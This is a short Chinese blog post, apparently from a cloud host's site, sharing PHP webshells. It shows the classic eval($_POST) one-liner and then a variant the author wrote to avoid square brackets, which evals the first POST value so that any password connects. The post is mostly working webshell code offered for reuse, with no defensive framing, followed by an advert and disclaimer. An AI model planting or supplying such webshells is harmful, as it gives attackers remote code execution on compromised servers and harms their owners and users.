前段时间做测试时候研究出来的,忘记截图了。
当时的环境是没waf,上传了一个php的webshell,但是连接时提示[]有问题,当时用的是传统的一句话
计算
安全
数据库
网络和加速
企业服务
<?php eval($_POST['xxx']);?>测试了一会,还是不行,尝试使用了另一个php文件,看看是不是网站解析有问题
<?php phpinfo();?>是可以正常显示的,那么问题点在post数组中括号出了问题,所以需要一个不使用中括号的webshell,研究了一会写出了以下的webshell,不需要中括号,任意密码即可连接
<?
$code = '';
foreach($_POST as $a){
$code = $a; //取出post数组第一个值
break; //直接跳出循环
}
eval($code); //执行了第一个post数组的值
?>任意密码连接
![php无[]shell分享](https://cache.yisu.com/upload/information/20200310/64/118383.jpg)
错误之处,敬请指正
亿速云「云服务器」,即开即用、新一代英特尔至强铂金CPU、三副本存储NVMe SSD云盘,价格低至29元/月。点击查看>>
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。
